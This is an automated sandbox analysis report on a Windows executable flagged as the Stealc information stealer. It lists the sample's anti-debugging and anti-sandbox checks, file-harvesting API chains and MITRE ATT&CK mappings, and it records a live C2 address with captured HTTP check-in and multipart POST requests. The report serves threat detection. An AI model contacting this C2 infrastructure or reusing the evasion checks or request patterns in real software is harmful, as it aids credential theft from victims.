                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529037A second address: 52903C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5AD8CCD66Ch 0x00000008 call 00007F5AD8CCD672h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F5AD8CCD66Ah 0x0000001b xor eax, 73ACA698h 0x00000021 jmp 00007F5AD8CCD66Bh 0x00000026 popfd 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903C0 second address: 5290426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushfd 0x00000006 jmp 00007F5AD8CCF43Bh 0x0000000b sbb eax, 7D06DF5Eh 0x00000011 jmp 00007F5AD8CCF449h 0x00000016 popfd 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c jmp 00007F5AD8CCF447h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5AD8CCF445h 0x0000002a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E01C61 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E01B96 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FC1AB0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FAF4DC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BB38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BB4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BAE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BAED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BB4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BAF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BB3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BA16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA1160 GetSystemInfo,ExitProcess,0_2_00BA1160
                Source: file.exe, file.exe, 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareQ(
                Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2194021053.000000000146C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2194021053.0000000001438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13637
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13640
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13652
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13692
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13656
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA45C0 VirtualProtect ?,00000004,00000100,000000000_2_00BA45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BB9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9750 mov eax, dword ptr fs:[00000030h]0_2_00BB9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00BB78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2324, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BB9600
                Source: file.exe, file.exe, 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: CGTProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00BB7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00BB7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00BB7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00BB7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ba0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2152337269.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2324, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ba0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2152337269.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2324, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phplfile.exe, 00000000.00000002.2194021053.000000000146C000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/?file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37Wfile.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.php3file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpsfile.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.phpXfile.exe, 00000000.00000002.2194021053.0000000001459000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.37/e2b1563c6670f193.phpgfile.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.37
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1528463
                                Start date and time:2024-10-07 23:22:07 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 52s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 86
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.37file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                • 185.215.113.103

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.947078666482964
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'853'440 bytes
                                MD5:c6761f44bbab998af58149acb8f7a920
                                SHA1:b37887456c6ebb6619f8c120bc6d7fd31f80ad27
                                SHA256:b1ac855c1055c03377a9b3b00f2d967f0bd6f6066a9215df60e951bd45741c8f
                                SHA512:9828a7addd7cf9747a94a62b00b3d5df754b0418838bf4752b5c5499879746baff23604411ee22ce1650184e339c989442ae79bde2b05e32255e33619413fdbf
                                SSDEEP:49152:/j9uXVDKh17nk1gO98pWbTXqPGHr4Jv79yM3YV:QmAgO9mW3XR4tt3A
                                TLSH:FB8533471DED68ABC0510DFFD06F43B7B749F171CED1818AA80A9F64C9DB846C5A8CA8
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xaa1000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007F5AD87B2BEAh

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x25b0000x22800cbb74a99996db503240275a1c0bfdef1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x25e0000x2a30000x200ed0a1bb6a672f5209a246f8af4aed586unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                nwkcdrfe0x5010000x19f0000x19e400a06def18cfa6f98e15507053da52b7fdFalse0.9947724143783947data7.953317466464678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                wlorzjea0x6a00000x10000x600c5f433c23eb94a5a675247b08520116eFalse0.5481770833333334data4.905536567564007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x6a10000x30000x2200e44e98ee60d07cbada4a54dcb100bce6False0.06571691176470588DOS executable (COM)0.7750888768816555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-07T23:23:07.566582+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649711185.215.113.3780TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 7, 2024 23:23:06.653749943 CEST4971180192.168.2.6185.215.113.37
                                Oct 7, 2024 23:23:06.659321070 CEST8049711185.215.113.37192.168.2.6
                                Oct 7, 2024 23:23:06.659445047 CEST4971180192.168.2.6185.215.113.37
                                Oct 7, 2024 23:23:06.659970045 CEST4971180192.168.2.6185.215.113.37
                                Oct 7, 2024 23:23:06.664891005 CEST8049711185.215.113.37192.168.2.6
                                Oct 7, 2024 23:23:07.340713024 CEST8049711185.215.113.37192.168.2.6
                                Oct 7, 2024 23:23:07.342571020 CEST4971180192.168.2.6185.215.113.37
                                Oct 7, 2024 23:23:07.345557928 CEST4971180192.168.2.6185.215.113.37
                                Oct 7, 2024 23:23:07.350513935 CEST8049711185.215.113.37192.168.2.6
                                Oct 7, 2024 23:23:07.564943075 CEST8049711185.215.113.37192.168.2.6
                                Oct 7, 2024 23:23:07.566581964 CEST4971180192.168.2.6185.215.113.37
                                Oct 7, 2024 23:23:10.032208920 CEST4971180192.168.2.6185.215.113.37

                                HTTP Request Dependency Graph

                                • 185.215.113.37

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.649711185.215.113.37802324C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Oct 7, 2024 23:23:06.659970045 CEST89OUTGET / HTTP/1.1
                                Host: 185.215.113.37
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 7, 2024 23:23:07.340713024 CEST203INHTTP/1.1 200 OK
                                Date: Mon, 07 Oct 2024 21:23:07 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 7, 2024 23:23:07.345557928 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFID
                                Host: 185.215.113.37
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
